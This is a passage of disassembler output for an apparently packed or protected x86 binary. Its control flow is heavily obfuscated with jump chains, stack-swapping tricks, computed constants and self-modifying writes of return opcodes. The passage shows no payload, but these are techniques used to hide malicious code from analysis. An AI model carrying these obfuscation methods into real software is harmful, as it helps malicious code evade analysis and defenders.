; END OF FUNCTION CHUNK	FOR sub_44E90D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_45413F:				; CODE XREF: sub_44B2D7-C4B9j
		jnz	loc_43EAB5
		jmp	loc_45B761
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------

loc_45414A:				; CODE XREF: k2vbe3.d:0043EF50j
		pop	edx
		and	eax, ebx
		add	ebx, 0D2A75B1Ch
		or	edx, ebx
		pop	eax
		jmp	loc_43CB10
; ---------------------------------------------------------------------------
		or	edi, ebp
		jmp	sub_4542E1
; ---------------------------------------------------------------------------

loc_454162:				; DATA XREF: sub_44C90E-D1BCo
		xchg	ebp, [esp]
		call	sub_454E83
		push	0E2465FCDh
		pop	eax
		rol	eax, 6
		jmp	loc_43E514
; ---------------------------------------------------------------------------

loc_454178:				; CODE XREF: k2vbe3.d:loc_44E721j
					; k2vbe3.d:0044E738j
		add	ecx, 0E7F4A001h
		xchg	ecx, [esp]
		jmp	sub_4553CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_454186:				; CODE XREF: sub_4460FD:loc_44CC31j
		rol	eax, 10h
		sub	eax, 0E7E6FDA7h
		push	edi
		push	6E2C2BB0h
		pop	edi
		and	edi, 0ADB77A6Fh
		xor	edi, 0A510DD8Ch
		push	offset loc_456B1E
		jmp	loc_456D72
; END OF FUNCTION CHUNK	FOR sub_4460FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E503

loc_4541AC:				; CODE XREF: sub_44B8EF:loc_441453j
					; sub_44E503:loc_449055j
		jnz	loc_44955D

loc_4541B2:				; CODE XREF: sub_4478F3+Aj
		jmp	nullsub_275
; END OF FUNCTION CHUNK	FOR sub_44E503
; ---------------------------------------------------------------------------
		ror	ecx, 0Fh
		sbb	ecx, ebx
		jmp	loc_449553
; ---------------------------------------------------------------------------

loc_4541C1:				; CODE XREF: k2vbe3.d:00454F4Dj
		pushf

; =============== S U B	R O U T	I N E =======================================



sub_4541C2	proc near		; CODE XREF: sub_44F20A-10CFBp

; FUNCTION CHUNK AT 00448A12 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	eax, [ebp-4]
		push	offset loc_43D106
		jmp	loc_448A12
sub_4541C2	endp


; =============== S U B	R O U T	I N E =======================================



sub_4541D3	proc near		; DATA XREF: sub_44128B:loc_450979o

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 00442DC0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004476B5 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00449625 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BBE5 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00453157 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C351 SIZE 00000022 BYTES

		push	eax
		push	ebp
		push	eax
		pop	ebp
		xchg	ebp, [esp+8+var_8]
		mov	edx, eax
		jmp	loc_453157
sub_4541D3	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_338. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_4541E2:				; CODE XREF: sub_440C94+F58Cj
		jmp	nullsub_376
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------

loc_4541E7:				; CODE XREF: k2vbe3.d:0043E91Bj
		jmp	loc_45BFD1

; =============== S U B	R O U T	I N E =======================================



sub_4541EC	proc near		; CODE XREF: k2vbe3.d:0043F38Fj
					; sub_45B74D:loc_4405CFp

; FUNCTION CHUNK AT 00453DB0 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00458247 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	eax, [ebp-4]
		call	nullsub_10
		jmp	loc_458247
sub_4541EC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BDBB

loc_4541FD:				; CODE XREF: sub_44BDBB:loc_44EC19j
		pop	edx
		sub	edx, 883AF4E7h
		add	edx, 7A24E82Ch
		call	sub_454F3E

loc_45420F:				; CODE XREF: sub_447BE9+110BDj
		jmp	loc_43DE23
; END OF FUNCTION CHUNK	FOR sub_44BDBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E90D

loc_454214:				; CODE XREF: sub_44E90D+2CCDj
		jmp	loc_449A22
; END OF FUNCTION CHUNK	FOR sub_44E90D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_454219:				; CODE XREF: sub_44ED3C:loc_457B44j
		cmp	eax, 0A0AD0BE6h
		jmp	loc_44C97F
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------

loc_454224:				; CODE XREF: k2vbe3.d:0045374Dj
		cdq

; =============== S U B	R O U T	I N E =======================================



sub_454225	proc near		; CODE XREF: sub_442DF0+18Cp

; FUNCTION CHUNK AT 0043F7DD SIZE 0000000A BYTES

		xchg	edi, [esp+0]

loc_454228:				; CODE XREF: k2vbe3.d:loc_44DF76j
					; sub_45C041:loc_45650Cj
		pop	edi
		call	sub_45B20A
		push	eax
		jmp	loc_43F7DD
sub_454225	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_454234	proc near		; CODE XREF: sub_44AFD4j

; FUNCTION CHUNK AT 0043F7C7 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00447D9F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004563C7 SIZE 00000005 BYTES

		push	ebp
		jmp	loc_4563C7
sub_454234	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_45423A	proc near		; CODE XREF: k2vbe3.d:00446743p
					; k2vbe3.d:00453DCAj
		xchg	edx, [esp+0]
sub_45423A	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_45423D:				; CODE XREF: sub_4424CF+4Fj
		pop	edx
		mov	[eax], edx

loc_454240:				; CODE XREF: sub_45482D+7j
		jb	loc_45198A
		jmp	loc_459B8A
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_45424B:				; CODE XREF: sub_44ED3C:loc_44D28Cj
		jnz	loc_4578FB
		jmp	loc_44DD4E
; END OF FUNCTION CHUNK	FOR sub_44ED3C

; =============== S U B	R O U T	I N E =======================================



sub_454256	proc near		; DATA XREF: sub_43D612+143ADo
		mov	esi, ecx
		pop	ecx
		lea	eax, sub_442CA7
		mov	byte ptr [eax],	0C3h
		jmp	sub_442CA7
sub_454256	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442CA7

loc_454267:				; CODE XREF: sub_442CA7+1j
		mov	eax, [esp-4+arg_0]
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp+0]
		jmp	loc_45601E
; END OF FUNCTION CHUNK	FOR sub_442CA7
; ---------------------------------------------------------------------------

loc_454275:				; CODE XREF: k2vbe3.d:loc_447BDCj
		pop	esi
		rol	esi, 0Dh
		cmp	esi, 8BF63870h
		jmp	loc_44362D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E83

loc_454284:				; CODE XREF: sub_454E83:loc_45B51Ej
		jge	loc_45729D

loc_45428A:				; CODE XREF: sub_45A323+105j
		jmp	loc_43C347
; END OF FUNCTION CHUNK	FOR sub_454E83
; ---------------------------------------------------------------------------
		test	ebp, 7286E56Ah
		jmp	loc_43DF43

; =============== S U B	R O U T	I N E =======================================



sub_45429A	proc near		; CODE XREF: k2vbe3.d:0043DD00j
					; k2vbe3.d:004510F8p

arg_0		= dword	ptr  4

		xchg	eax, [esp+0]
		pop	eax
		xchg	edi, [esp-4+arg_0]
		jmp	sub_454E83
sub_45429A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	eax, 6A74FD15h
		call	sub_4553CC
		mov	ds:dword_41E19C, eax
		lea	eax, nullsub_12
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_12
; ---------------------------------------------------------------------------
		mov	ecx, 3D74F2B8h
		jmp	sub_440D6A
; ---------------------------------------------------------------------------
		shl	edx, 13h
		jmp	loc_44B448
; ---------------------------------------------------------------------------

loc_4542D6:				; CODE XREF: k2vbe3.d:loc_44782Ej
		jnb	loc_454C10
		jmp	loc_4452AF

; =============== S U B	R O U T	I N E =======================================



sub_4542E1	proc near		; CODE XREF: sub_4582DD-14E46p
					; k2vbe3.d:0045415Dj
		xchg	esi, [esp+0]
		pop	esi
		add	eax, edx
		call	sub_43C745

loc_4542EC:				; CODE XREF: sub_457B49-EF0Cj
		jmp	loc_454D87
sub_4542E1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456706

loc_4542F1:				; CODE XREF: sub_456706-127B0j
		jmp	nullsub_214
; END OF FUNCTION CHUNK	FOR sub_456706
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4423D2

loc_4542F6:				; CODE XREF: sub_4423D2+1B62j
		jmp	loc_44D128
; END OF FUNCTION CHUNK	FOR sub_4423D2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4570C0

loc_4542FB:				; CODE XREF: sub_4570C0-7E7Aj
		xchg	eax, [esp+4+var_4]
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		xchg	edi, [esp+8+var_8]
		mov	ebp, edi
		jmp	loc_4424B5
; END OF FUNCTION CHUNK	FOR sub_4570C0
; ---------------------------------------------------------------------------

loc_45430D:				; CODE XREF: k2vbe3.d:0044832Dj
		jbe	loc_442618
		jnz	loc_43D1AD
		add	edi, ecx
		mov	[ebp+0], ecx
		sbb	edi, ebp
		jmp	loc_4520E3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C564

loc_454325:				; CODE XREF: sub_44C564-28E2j
		jnz	loc_453893
; END OF FUNCTION CHUNK	FOR sub_44C564
; START	OF FUNCTION CHUNK FOR sub_4479A1

loc_45432B:				; CODE XREF: sub_4479A1+F1ABj
		jmp	loc_4464C1
; END OF FUNCTION CHUNK	FOR sub_4479A1
; ---------------------------------------------------------------------------

loc_454330:				; CODE XREF: k2vbe3.d:004514A8j
		jmp	loc_446E59
; ---------------------------------------------------------------------------
		or	edx, 5563E18Ch
		jmp	loc_45388B
; ---------------------------------------------------------------------------

loc_454340:				; CODE XREF: k2vbe3.d:0044D01Dj
		sub	edx, 14B7627Fh
		add	edx, 0A10AF629h
		xchg	edx, [esp]
		jmp	sub_4597AE

; =============== S U B	R O U T	I N E =======================================



sub_454354	proc near		; CODE XREF: sub_4479A1-14D9j
					; sub_45C041-EEA9p

; FUNCTION CHUNK AT 00440CB5 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00442726 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451D23 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045408A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00458F49 SIZE 0000000B BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		cmp	byte ptr [eax],	0F1h
		jnz	loc_45408F
		jmp	loc_458F49
sub_454354	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_454366:				; CODE XREF: sub_44C90E:loc_453335j
		jz	loc_4539F4
		jmp	loc_43ECE1
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_454371:				; CODE XREF: k2vbe3.d:00447434j
		jg	loc_454EC5

loc_454377:				; CODE XREF: k2vbe3.d:00446A0Cj
		jnp	loc_44A191
		mov	ebx, [edx]
		js	loc_4486F2
		jmp	loc_4436B2
; ---------------------------------------------------------------------------
		mov	ds:dword_41E108, eax
		lea	eax, nullsub_283
		mov	byte ptr [eax],	0C3h
		jmp	loc_450EE6

; =============== S U B	R O U T	I N E =======================================



sub_45439E	proc near		; CODE XREF: sub_41BD4E+20p
					; sub_41BF50+43p ...
		call	sub_43D0A9
		jmp	ds:off_41E10C
sub_45439E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_4543A9:				; CODE XREF: sub_43F7AC+1223Dj
		jmp	loc_44B03F
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_178. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_136. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_4543B0	proc near		; CODE XREF: k2vbe3.d:00441567j
					; sub_454E69-838Fp

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044047B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E603 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00457DB3 SIZE 00000017 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	eax
		push	0AA65A13Dh
		xchg	ebp, [esp+4+var_4]
		jmp	loc_457DB3
sub_4543B0	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4486D7

loc_4543C2:				; CODE XREF: sub_4486D7:loc_44B374j
		jl	loc_449FAF

loc_4543C8:				; CODE XREF: k2vbe3.d:0044A2A0j
		jmp	nullsub_155
; END OF FUNCTION CHUNK	FOR sub_4486D7
; ---------------------------------------------------------------------------
		and	edx, 0DEB87202h
		mov	esi, edi
		jmp	loc_449FAE
; ---------------------------------------------------------------------------

loc_4543DA:				; CODE XREF: k2vbe3.d:00449EF3j
		or	[ecx+edx], al
		push	0C763E611h
		pop	eax
		sub	eax, 0CB149BBAh
		cmp	eax, 0FBEE7E84h
		jmp	loc_4563C2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_4543F4:				; CODE XREF: sub_44921C-68F2j
		mov	byte ptr [eax],	6Ch
		call	sub_4529E2
; END OF FUNCTION CHUNK	FOR sub_44921C
; START	OF FUNCTION CHUNK FOR sub_4530DF

loc_4543FC:				; CODE XREF: sub_4530DF+Bj
		jmp	loc_459314
; END OF FUNCTION CHUNK	FOR sub_4530DF
; ---------------------------------------------------------------------------

locret_454401:				; CODE XREF: k2vbe3.d:004569EEj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447664

loc_454402:				; CODE XREF: sub_447664-59F7j
		jmp	loc_44A08C
; END OF FUNCTION CHUNK	FOR sub_447664

; =============== S U B	R O U T	I N E =======================================



sub_454407	proc near		; CODE XREF: k2vbe3.d:00441025j
					; sub_454EBB:loc_4420A6p
		xchg	edx, [esp+0]
		pop	edx
		push	esi
		push	64EA8AC0h
sub_454407	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4461D5

loc_454411:				; CODE XREF: sub_4461D5:loc_44910Fj
		pop	esi
		jmp	loc_448958
; END OF FUNCTION CHUNK	FOR sub_4461D5
; ---------------------------------------------------------------------------
		push	offset sub_4522E6
		jmp	loc_44B0DD
; ---------------------------------------------------------------------------
		popf

loc_454422:				; CODE XREF: k2vbe3.d:loc_45A9ADj
		jmp	loc_457D00
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444966

loc_454427:				; CODE XREF: sub_444966-59EEj
					; sub_444966:loc_447189j
		call	sub_44FA2A
		call	sub_440D6A

loc_454431:				; CODE XREF: sub_443FC1+DCE1j
		jmp	loc_44068B
; END OF FUNCTION CHUNK	FOR sub_444966
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CF35

loc_454436:				; CODE XREF: sub_43CF35+1E355j
		ror	edi, 10h
		mov	ebp, [esi]
		jz	loc_455015
		adc	ebp, 3F4CCCBDh
; END OF FUNCTION CHUNK	FOR sub_43CF35

; =============== S U B	R O U T	I N E =======================================



sub_454447	proc near		; CODE XREF: sub_43CF35:loc_45967Dj

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004400BA SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00448F81 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B23C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453D37 SIZE 00000024 BYTES

		push	ebx
		push	10F249F2h
		jmp	loc_448F81
sub_454447	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44416D

loc_454452:				; CODE XREF: sub_44416D:loc_44087Dj
		mov	eax, [ebp-20h]
		call	sub_454463
		pop	ecx
		mov	[ebp-20h], eax
		jmp	loc_45841B
; END OF FUNCTION CHUNK	FOR sub_44416D

; =============== S U B	R O U T	I N E =======================================



sub_454463	proc near		; CODE XREF: sub_44416D+102E8p

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 00449CD9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BC98 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044E586 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045681A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045AD12 SIZE 0000001E BYTES

		push	ebp
		jmp	loc_449CD9
sub_454463	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E0F6

loc_454469:				; CODE XREF: sub_44E0F6-BD5Aj
		sub	eax, ebx
		sbb	ebp, 0CBD780F9h
		adc	ebx, edx

loc_454473:				; CODE XREF: sub_457D4B-159C6j
		add	eax, 92BEA1B1h
		call	sub_448113
		jz	loc_459DF5
		add	eax, 7D0h
		mov	[ebp-8], eax
		jmp	loc_43F256
; END OF FUNCTION CHUNK	FOR sub_44E0F6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_303. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		push	0C33F07F0h
		pop	eax
		or	eax, 0E3DC864Ch
		sub	eax, 0F809C63Dh
		xor	eax, 4CB74C19h
		sub	eax, 7AB5C95Fh
		add	eax, 588E353Fh
		push	esi
		jmp	loc_44368E
; ---------------------------------------------------------------------------

loc_4544BC:				; DATA XREF: sub_4461D5:loc_4484FAo
		push	eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA1E

loc_4544BE:				; CODE XREF: sub_43DA1E+2435j
		jmp	loc_44C93A
; END OF FUNCTION CHUNK	FOR sub_43DA1E

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4544C3	proc near		; CODE XREF: sub_457A42+Ap

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043CAF3 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 004510FD SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045237C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004539A1 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00458B32 SIZE 00000005 BYTES

		push	edi
		mov	edi, ebp
		xchg	edi, [esp+0]
		mov	ebp, esp
		push	eax
		jmp	loc_4539A1
sub_4544C3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FF97

loc_4544D1:				; CODE XREF: sub_44FF97:loc_45A161j
		xchg	eax, [esp+4+var_4]
		jmp	sub_45B74D
; END OF FUNCTION CHUNK	FOR sub_44FF97
; ---------------------------------------------------------------------------

loc_4544D9:				; DATA XREF: sub_44C1BD:loc_4404EFo
		push	edi
		mov	edi, ebp
		xchg	edi, [esp]
		mov	ebp, esp
		jmp	loc_45879F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440D7B

loc_4544E6:				; CODE XREF: sub_440D7B+15713j
		add	edi, 4AC4A02Ch

loc_4544EC:				; CODE XREF: sub_440D7B:loc_45281Cj
		call	sub_4436CE

loc_4544F1:				; CODE XREF: k2vbe3.d:004538C5j
		mov	edx, 0D504D785h
		call	sub_45B20A
		push	ebx
		jmp	loc_4531A3
; END OF FUNCTION CHUNK	FOR sub_440D7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F34C

loc_454501:				; CODE XREF: sub_43F34C+B794j
		popf

loc_454502:				; CODE XREF: k2vbe3.d:loc_452C36j
		rol	ecx, 1Ch
		xchg	ebp, [edi]
		jmp	loc_45975C
; END OF FUNCTION CHUNK	FOR sub_43F34C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E83

loc_45450C:				; CODE XREF: sub_454E83+381Bj
		push	offset sub_44ABBB
		jmp	nullsub_424
; END OF FUNCTION CHUNK	FOR sub_454E83

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_454516	proc near		; CODE XREF: sub_444966:loc_45B341j
		retn
sub_454516	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_454517:				; CODE XREF: sub_44B2D7-1879j
		jmp	sub_453347
; END OF FUNCTION CHUNK	FOR sub_44B2D7

; =============== S U B	R O U T	I N E =======================================



sub_45451C	proc near		; CODE XREF: k2vbe3.d:0044786Cj
					; sub_446258:loc_45032Dp

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00442BB4 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004449A7 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00444DDD SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004484B9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EA1F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450277 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00451A13 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451A9E SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00452E8E SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004580C6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B301 SIZE 0000000E BYTES

		xchg	eax, [esp+0]
		pop	eax
		pop	ebp
		push	0A5067C35h
		pop	eax
		and	eax, 0C85B76A4h
		sub	eax, 0A261417Ch
		jmp	loc_442BB4
sub_45451C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_454538:				; CODE XREF: sub_445124+FF3Bj
		call	sub_45BDE4
		push	5B1333A0h
		pop	eax
		or	eax, 0D43ADED8h
		add	eax, 0DBCD121Ch
		add	eax, ebp
		jmp	loc_442335
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455A4F

loc_454556:				; CODE XREF: sub_455A4F:loc_454781j
		push	0E18791ADh
		pop	ebx
		sub	ebx, 2344724h
		xor	ebx, 0AFDDBCD7h
		push	offset loc_4506D4
		jmp	loc_441C98
; END OF FUNCTION CHUNK	FOR sub_455A4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AA63

loc_454572:				; CODE XREF: sub_45AA63:loc_4573EAj
		push	edi
		mov	edi, edx
		xchg	edi, [esp+0]
		call	sub_43C206
		mov	eax, 201E933Eh
		push	ebx
		push	0E1884B59h
		pop	ebx
		jmp	loc_44D585
; END OF FUNCTION CHUNK	FOR sub_45AA63

; =============== S U B	R O U T	I N E =======================================



sub_45458E	proc near		; CODE XREF: k2vbe3.d:0044B2F8j
					; sub_44F3EE+Ap

; FUNCTION CHUNK AT 00447F42 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		lea	eax, sub_456C5F
		mov	byte ptr [eax],	0C3h
		jmp	loc_447F42
sub_45458E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456C5F

loc_4545A0:				; CODE XREF: sub_456C5F-15EA1j
		mov	eax, [esp-4+arg_0]
		jmp	loc_443D74
; END OF FUNCTION CHUNK	FOR sub_456C5F
; ---------------------------------------------------------------------------
		adc	ebp, 8252B0FAh
		jmp	sub_45C089
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_4545B3:				; CODE XREF: sub_4467A1+13D11j
		jnz	nullsub_374
		or	esi, 0D73F4306h
		jmp	loc_45569D
; END OF FUNCTION CHUNK	FOR sub_4467A1

; =============== S U B	R O U T	I N E =======================================



sub_4545C4	proc near		; CODE XREF: sub_43FD26p
					; sub_447266:loc_4490DCj ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00443F75 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00447240 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044AB96 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045174F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045238C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00459585 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B7A4 SIZE 00000014 BYTES

		jns	loc_452394
		xchg	eax, [esp+4+var_4]
		mov	edx, eax
		pop	eax
		mov	eax, [esp+0]
		jmp	loc_45174F
sub_4545C4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_4545D8:				; CODE XREF: sub_44B912:loc_4461C3j
		jnz	loc_43F220
		jmp	loc_44039B
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459DA3

loc_4545E3:				; CODE XREF: sub_459DA3:loc_43C357j
		push	ecx
		jmp	loc_4515B9
; END OF FUNCTION CHUNK	FOR sub_459DA3
; ---------------------------------------------------------------------------

locret_4545E9:				; CODE XREF: k2vbe3.d:0044AC3Fj
		retn
; ---------------------------------------------------------------------------

loc_4545EA:				; DATA XREF: sub_4534C2:loc_444762o
		mov	eax, [esp]
		push	eax
		call	sub_448D3A
		or	eax, eax
		jnz	loc_43F5EE
		jmp	loc_444A4A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D823

loc_454600:				; CODE XREF: sub_43D823:loc_456762j
		jnz	loc_444632
		jmp	loc_43C8A9
; END OF FUNCTION CHUNK	FOR sub_43D823
; ---------------------------------------------------------------------------

loc_45460B:				; CODE XREF: k2vbe3.d:0045BE22j
		jnp	loc_458E43

loc_454611:				; CODE XREF: k2vbe3.d:0045BE0Cj
		and	ebx, 0D48E1223h
		sub	ebx, 5D091B3h
		jnb	loc_45847A
		xor	ebp, 0B7111E9Dh
		jmp	loc_458478
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_120. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AA63

loc_45462F:				; CODE XREF: sub_45AA63+Ej
		jmp	loc_457EF9
; END OF FUNCTION CHUNK	FOR sub_45AA63
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456541

loc_454634:				; CODE XREF: sub_456541-1E70j
		jmp	loc_445207
; END OF FUNCTION CHUNK	FOR sub_456541

; =============== S U B	R O U T	I N E =======================================



sub_454639	proc near		; CODE XREF: k2vbe3.d:00444BB8j
					; sub_44B912-5781p

; FUNCTION CHUNK AT 0043CF83 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043E839 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043F2A7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449CDE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451338 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004520C3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045402F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458517 SIZE 0000000B BYTES

		xchg	edx, [esp+0]
		pop	edx
		xor	ecx, 69C5074Bh
		call	sub_44E542

loc_454648:				; CODE XREF: sub_44C90E+4D02j
		jmp	loc_45402F
sub_454639	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_45464D:				; CODE XREF: sub_44D0D5-B4ECj
		jmp	loc_44E789
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FA2C

loc_454652:				; CODE XREF: sub_43FA2C+EE0j
		jmp	nullsub_280
; END OF FUNCTION CHUNK	FOR sub_43FA2C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E4CE

loc_454657:				; CODE XREF: sub_44E4CE:loc_452F42j
		xchg	ecx, [esp+4+var_4]
		mov	esi, ebp
		xchg	esi, [esp+4+var_4]
		call	sub_4469E1
; END OF FUNCTION CHUNK	FOR sub_44E4CE
; START	OF FUNCTION CHUNK FOR sub_457A42

loc_454664:				; CODE XREF: sub_457A42:loc_458F2Cj
		jnz	loc_4475BE
		jmp	loc_459413
; END OF FUNCTION CHUNK	FOR sub_457A42
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E542

loc_45466F:				; CODE XREF: sub_44E542:loc_457058j
		ror	edx, 6
		jge	loc_44A3AB
		jmp	loc_452B83
; END OF FUNCTION CHUNK	FOR sub_44E542
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458DAF

loc_45467D:				; CODE XREF: sub_458DAF:loc_45AEC4j
					; k2vbe3.d:0045AED8j
		or	eax, 742CF7CEh
		add	eax, 88961F99h
		pushf
		push	edx
		jmp	loc_45BD33
; END OF FUNCTION CHUNK	FOR sub_458DAF
; ---------------------------------------------------------------------------
